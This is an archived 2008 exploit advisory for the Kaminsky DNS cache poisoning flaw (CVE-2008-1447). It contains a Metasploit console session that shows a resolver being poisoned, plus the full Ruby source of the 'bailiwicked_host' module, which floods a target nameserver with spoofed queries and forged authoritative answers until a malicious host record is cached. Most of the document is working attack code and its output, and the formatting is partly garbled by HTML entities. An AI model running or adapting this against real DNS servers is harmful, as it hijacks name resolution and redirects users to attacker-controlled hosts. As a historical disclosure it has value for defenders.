Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20222
HistoryJul 25, 2008 - 12:00 a.m.

CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit

2008-07-2500:00:00
vulners.com
96
                  ____      ____     __    __
                 /    \    /    \   |  |  |  |
    ----====####/  /\__\##/  /\  \##|  |##|  |####====----
               |  |      |  |__|  | |  |  |  |
               |  |  ___ |   __   | |  |  |  |

------======######\ \/ /#| |##| |#| |##| |######======------
\/ || || \__/

                Computer Academic Underground
                    http://www.caughq.org
                        Exploit Code

===============/========================================================
Exploit ID: CAU-EX-2008-0002
Release Date: 2008.07.23
Title: bailiwicked_host.rb
Description: Kaminsky DNS Cache Poisoning Flaw Exploit
Tested: BIND 9.4.1-9.4.2
Attributes: Remote, Poison, Resolver, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
Author/Email: I)ruid <druid (@) caughq.org>
H D Moore <hdm (@) metasploit.com>
===============/========================================================

Description

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious host entry
into the target nameserver. By causing the target nameserver to query
for random hostnames at the target domain, the attacker can spoof a
response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.

Example

/msf3/msfconsole

            _                  _       _ _
           | |                | |     &#40;_&#41; |

_ __ ___ | | __ _ ___ _ __ | | ___ | |
| '
` _ \ / _ \ / ` / _| ' \| |/ _ \| | __|
| | | | | | __/ || (
| \
\ |
) | | () | | |
|| || ||\|\\,|/ ./||\/||\__|
| |
|
|

   =[ msf v3.2-release
  • – --=[ 298 exploits - 124 payloads
  • – --=[ 18 encoders - 6 nops
    =[ 72 aux

msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > show options

Module options:

Name Current Setting Required Description


HOSTNAME pwned.example.com yes Hostname to hijack
NEWADDR 1.3.3.7 yes New address for hostname
RECONS 208.67.222.222 yes Nameserver used for reconnaissance
RHOST yes The target address
SRCPORT yes The target server's source query port (0 for automatic)
XIDS 10 yes Number of XIDs to try for each query

msf auxiliary(bailiwicked_host) > set RHOST A.B.C.D
RHOST => A.B.C.D

msf auxiliary(bailiwicked_host) > check
[] Using the Metasploit service to verify exploitability…
[
] >> ADDRESS: A.B.C.D PORT: 48178
[] >> ADDRESS: A.B.C.D PORT: 48178
[
] >> ADDRESS: A.B.C.D PORT: 48178
[] >> ADDRESS: A.B.C.D PORT: 48178
[
] >> ADDRESS: A.B.C.D PORT: 48178
[*] FAIL: This server uses static source ports and is vulnerable to poisoning

msf auxiliary(bailiwicked_host) > set SRCPORT 0
SRCPORT => 0

msf auxiliary(bailiwicked_host) > run
[] Switching to target port 48178 based on Metasploit service
[
] Targeting nameserver A.B.C.D
[] Querying recon nameserver for example.com.'s nameservers…
[
] Got answer with 2 answers, 0 authorities
[] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.
[
] Querying recon nameserver for address of ns89.worldnic.com
[] Got answer with 1 answers, 0 authorities
[
] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45
[] Checking Authoritativeness: Querying 205.178.190.45 for example.com
[
] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
[] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.
[
] Querying recon nameserver for address of ns90.worldnic.com
[] Got answer with 1 answers, 0 authorities
[
] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45
[] Checking Authoritativeness: Querying 205.178.144.45 for example.com
[
] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as
[] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178…
[
] Sent 1000 queries and 20000 spoofed responses…
[] Sent 2000 queries and 40000 spoofed responses…
[
] Sent 3000 queries and 60000 spoofed responses…
[] Sent 4000 queries and 80000 spoofed responses…
[
] Sent 5000 queries and 100000 spoofed responses…
[] Sent 6000 queries and 120000 spoofed responses…
[
] Sent 7000 queries and 140000 spoofed responses…
[] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7
[
] Auxiliary module execution completed
msf auxiliary(bailiwicked_host) >

msf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D
[*] exec: nslookup pwned.example.com A.B.C.D

Server: A.B.C.D
Address: A.B.C.D#53

Non-authoritative answer:
Name: pwned.example.com
Address: 1.3.3.7

Credits

Dan Kaminsky is credited with originally discovering this vulnerability.

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
http://www.kb.cert.org/vuls/id/800113

Metasploit

require 'msf/core'
require 'net/dns'
require 'scruby'
require 'resolv'

module Msf

class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary

    include Exploit::Remote::Ip

    def initialize&#40;info = {}&#41;
            super&#40;update_info&#40;info, 
                    &#39;Name&#39;           =&gt; &#39;DNS BailiWicked Host Attack&#39;,
                    &#39;Description&#39;    =&gt; &#37;q{
                            This exploit attacks a fairly ubiquitous flaw in DNS implementations

which
Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a
single
malicious host entry into the target nameserver by sending random
sub-domain
queries to the target DNS server coupled with spoofed replies to those
queries from the authoritative nameservers for the domain which
contain a
malicious host entry for the hostname to be poisoned in the authority
and
additional records sections. Eventually, a guessed ID will match and
the
spoofed packet will get accepted, and due to the additional hostname
entry
being within bailiwick constraints of the original request the
malicious host
entry will get cached.
},
'Author' => [ 'I)ruid', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 5585 $',
'References' =>
[
[ 'CVE', '2008-1447' ],
[ 'US-CERT-VU', '8000113' ],
[ 'URL',
'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt&#39; ],
],
'Privileged' => true,
'Targets' =>
[
["BIND",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
},
],
],
'DisclosureDate' => 'Jul 21 2008'
))

                    register_options&#40;
                            [
                                    OptPort.new&#40;&#39;SRCPORT&#39;, [true, &quot;The target server&#39;s source

query port (0 for automatic)", nil]),
OptString.new('HOSTNAME', [true, 'Hostname to hijack',
'pwned.example.com']),
OptAddress.new('NEWADDR', [true, 'New address for hostname',
'1.3.3.7']),
OptAddress.new('RECONS', [true, 'Nameserver used for
reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'Number of XIDs to try for each
query', 10]),
OptInt.new('TTL', [true, 'TTL for the malicious host entry',
31337]),
], self.class)

    end
    
    def auxiliary_commands
            return { &quot;check&quot; =&gt; &quot;Determine if the specified DNS server &#40;RHOST&#41; is vulnerable&quot; }
    end

    def cmd_check&#40;*args&#41;
            targ = args[0] || rhost&#40;&#41;
            if&#40;not &#40;targ and targ.length &gt; 0&#41;&#41;
                    print_status&#40;&quot;usage: check [dns-server]&quot;&#41;
                    return
            end

            print_status&#40;&quot;Using the Metasploit service to verify exploitability...&quot;&#41;
            srv_sock = Rex::Socket.create_udp&#40;
                    &#39;PeerHost&#39; =&gt; targ,
                    &#39;PeerPort&#39; =&gt; 53
            &#41;               

            random = false
            ports  = []
            lport  = nil
            
            1.upto&#40;5&#41; do |i|
            
                    req = Resolv::DNS::Message.new
                    txt = &quot;spoofprobe-check-#{i}-#{$$}#{&#40;rand&#40;&#41;*1000000&#41;.to_i}.red.metasploit.com&quot;
                    req.add_question&#40;txt, Resolv::DNS::Resource::IN::TXT&#41;
                    req.rd = 1
                    
                    srv_sock.put&#40;req.encode&#41;
                    res, addr = srv_sock.recvfrom&#40;&#41;
                    

                    if res and res.length &gt; 0
                            res = Resolv::DNS::Message.decode&#40;res&#41;
                            res.each_answer do |name, ttl, data|
                                    if &#40;name.to_s == txt and data.strings.join&#40;&#39;&#39;&#41; =~

/^([^\s]+)\s+.*red\.metasploit\.com/m)
t_addr, t_port = $1.split(':')

                                            print_status&#40;&quot; &gt;&gt; ADDRESS: #{t_addr}  PORT:

#{t_port}")
t_port = t_port.to_i
if(lport and lport != t_port)
random = true
end
lport = t_port
ports << t_port
end
end
end
end

            srv_sock.close
            
            if&#40;ports.length &lt; 5&#41;
                    print_status&#40;&quot;UNKNOWN: This server did not reply to our vulnerability check

requests")
return
end

            if&#40;random&#41;
                    print_status&#40;&quot;PASS: This server does not use a static source port. Ports:

#{ports.join(", ")}")
print_status(" This server may still be exploitable, but not by this
tool.")
else
print_status("FAIL: This server uses static source ports and is vulnerable to
poisoning")
end
end

    def run
            target   = rhost&#40;&#41;
            source   = Rex::Socket.source_address&#40;target&#41;
            sport    = datastore[&#39;SRCPORT&#39;]
            hostname = datastore[&#39;HOSTNAME&#39;] + &#39;.&#39;
            address  = datastore[&#39;NEWADDR&#39;]
            recons   = datastore[&#39;RECONS&#39;]
            xids     = datastore[&#39;XIDS&#39;].to_i
            ttl      = datastore[&#39;TTL&#39;].to_i
            xidbase  = rand&#40;4&#41;+2*10000

            domain = hostname.match&#40;/[^&#92;x2e]+&#92;x2e[^&#92;x2e]+&#92;x2e$/&#41;[0]

            srv_sock = Rex::Socket.create_udp&#40;
                    &#39;PeerHost&#39; =&gt; target,
                    &#39;PeerPort&#39; =&gt; 53
            &#41;

            # Get the source port via the metasploit service if it&#39;s not set
            if sport.to_i == 0
                    req = Resolv::DNS::Message.new
                    txt = &quot;spoofprobe-#{$$}#{&#40;rand&#40;&#41;*1000000&#41;.to_i}.red.metasploit.com&quot;
                    req.add_question&#40;txt, Resolv::DNS::Resource::IN::TXT&#41;
                    req.rd = 1
                    
                    srv_sock.put&#40;req.encode&#41;
                    res, addr = srv_sock.recvfrom&#40;&#41;
                    
                    if res and res.length &gt; 0
                            res = Resolv::DNS::Message.decode&#40;res&#41;
                            res.each_answer do |name, ttl, data|
                                    if &#40;name.to_s == txt and data.strings.join&#40;&#39;&#39;&#41; =~

/^([^\s]+)\s+.*red\.metasploit\.com/m)
t_addr, t_port = $1.split(':')
sport = t_port.to_i

                                            print_status&#40;&quot;Switching to target port #{sport} based

on Metasploit service")
if target != t_addr
print_status("Warning: target address
#{target} is not the same as the nameserver's query source address #{t_addr}!")
end
end
end
end
end

            # Verify its not already cached
            begin
                    query = Resolv::DNS::Message.new
                    query.add_question&#40;hostname, Resolv::DNS::Resource::IN::A&#41;
                    query.rd = 0

                    begin
                            cached = false
                            srv_sock.put&#40;query.encode&#41;
                            answer, addr = srv_sock.recvfrom&#40;&#41;

                            if answer and answer.length &gt; 0
                                    answer = Resolv::DNS::Message.decode&#40;answer&#41;
                                    answer.each_answer do |name, ttl, data|
                                            if&#40;&#40;name.to_s + &quot;.&quot;&#41; == hostname  and

data.address.to_s == address)
t = Time.now + ttl
print_status("Failure: This hostname is
already in the target cache: #{name} == #{address}")
print_status(" Cache entry expires on
#{t.to_s}… sleeping.")
cached = true
sleep ttl
end
end
end
end until not cached
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")
end

            res0 = Net::DNS::Resolver.new&#40;:nameservers =&gt; [recons], :dns_search =&gt; false,

:recursive => true) # reconnaissance resolver

            print_status &quot;Targeting nameserver #{target} for injection of #{hostname} as

#{address}"

            # Look up the nameservers for the domain
            print_status &quot;Querying recon nameserver for #{domain}&#39;s nameservers...&quot;
            answer0 = res0.send&#40;domain, Net::DNS::NS&#41;
            #print_status &quot; Got answer with #{answer0.header.anCount} answers,

#{answer0.header.nsCount} authorities"

            barbs = [] # storage for nameservers
            answer0.answer.each do |rr0|
                    print_status &quot; Got an #{rr0.type} record: #{rr0.inspect}&quot;
                    if rr0.type == &#39;NS&#39;
                            print_status &quot;  Querying recon nameserver for address of

#{rr0.nsdname}…"
answer1 = res0.send(rr0.nsdname) # get the ns's answer for the
hostname
#print_status " Got answer with #{answer1.header.anCount} answers,
#{answer1.header.nsCount} authorities"
answer1.answer.each do |rr1|
print_status " Got an #{rr1.type} record: #{rr1.inspect}"
res2 = Net::DNS::Resolver.new(:nameservers => rr1.address,
:dns_search => false, :recursive => false, :retry => 1)
print_status " Checking Authoritativeness: Querying
#{rr1.address} for #{domain}…"
answer2 = res2.send(domain)
if answer2 and answer2.header.auth? and
answer2.header.anCount >= 1
nsrec = {:name => rr0.nsdname, :addr => rr1.address}
barbs << nsrec
print_status " #{rr0.nsdname} is authoritative for
#{domain}, adding to list of nameservers to spoof as"
end
end
end
end

            if barbs.length == 0
                    print_status&#40; &quot;No DNS servers found.&quot;&#41;
                    srv_sock.close
                    disconnect_ip
                    return
            end

            # Flood the target with queries and spoofed responses, one will eventually hit
            queries = 0
            responses = 0

            connect_ip if not ip_sock

            print_status&#40; &quot;Attempting to inject a poison record for #{hostname} into

#{target}:#{sport}…")

            while true
                    randhost = Rex::Text.rand_text_alphanumeric&#40;12&#41; + &#39;.&#39; + domain # randomize

the hostname

                    # Send spoofed query
                    req = Resolv::DNS::Message.new
                    req.id = rand&#40;2**16&#41;
                    req.add_question&#40;randhost, Resolv::DNS::Resource::IN::A&#41;

                    req.rd = 1

                    buff = &#40;
                            Scruby::IP.new&#40;
                                    #:src   =&gt; barbs[0][:addr].to_s,
                                    :src   =&gt; source,
                                    :dst   =&gt; target,
                                    :proto =&gt; 17
                            &#41;/Scruby::UDP.new&#40;
                                    :sport =&gt; &#40;rand&#40;&#40;2**16&#41;-1024&#41;+1024&#41;.to_i,
                                    :dport =&gt; 53
                            &#41;/req.encode
                    &#41;.to_net
                    ip_sock.sendto&#40;buff, target&#41;
                    queries += 1
                    
                    # Send evil spoofed answer from ALL nameservers &#40;barbs[*][:addr]&#41;
                    req.add_answer&#40;randhost, ttl, Resolv::DNS::Resource::IN::A.new&#40;address&#41;&#41;
                    req.add_authority&#40;domain, ttl,

Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))
req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))
req.qr = 1
req.ra = 1

                    xidbase.upto&#40;xidbase+xids-1&#41; do |id|
                            req.id = id
                            barbs.each do |barb|
                                    buff = &#40;
                                            Scruby::IP.new&#40;
                                                    #:src   =&gt; barbs[i][:addr].to_s,
                                                    :src   =&gt; barb[:addr].to_s,
                                                    :dst   =&gt; target,
                                                    :proto =&gt; 17
                                            &#41;/Scruby::UDP.new&#40;
                                                    :sport =&gt; 53,
                                                    :dport =&gt; sport.to_i
                                            &#41;/req.encode
                                    &#41;.to_net
                                    ip_sock.sendto&#40;buff, target&#41;
                                    responses += 1
                            end
                    end

                    # status update
                    if queries &#37; 1000 == 0
                            print_status&#40;&quot;Sent #{queries} queries and #{responses} spoofed

responses…")
end

                    # every so often, check and see if the target is poisoned...
                    if queries &#37; 250 == 0 
                            begin
                                    query = Resolv::DNS::Message.new
                                    query.add_question&#40;hostname, Resolv::DNS::Resource::IN::A&#41;
                                    query.rd = 0
    
                                    srv_sock.put&#40;query.encode&#41;
                                    answer, addr = srv_sock.recvfrom&#40;&#41;

                                    if answer and answer.length &gt; 0
                                            answer = Resolv::DNS::Message.decode&#40;answer&#41;
                                            answer.each_answer do |name, ttl, data|
                                                    if&#40;&#40;name.to_s + &quot;.&quot;&#41; == hostname and

data.address.to_s == address)
print_status("Poisoning successful
after #{queries} attempts: #{name} == #{address}")
disconnect_ip
return
end
end
end
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_status("Error querying the DNS name: #{e.class} #{e}
#{e.backtrace}")
end
end

            end

    end

end
end


I)ruid, C²ISSP
[email protected]
http://druid.caughq.org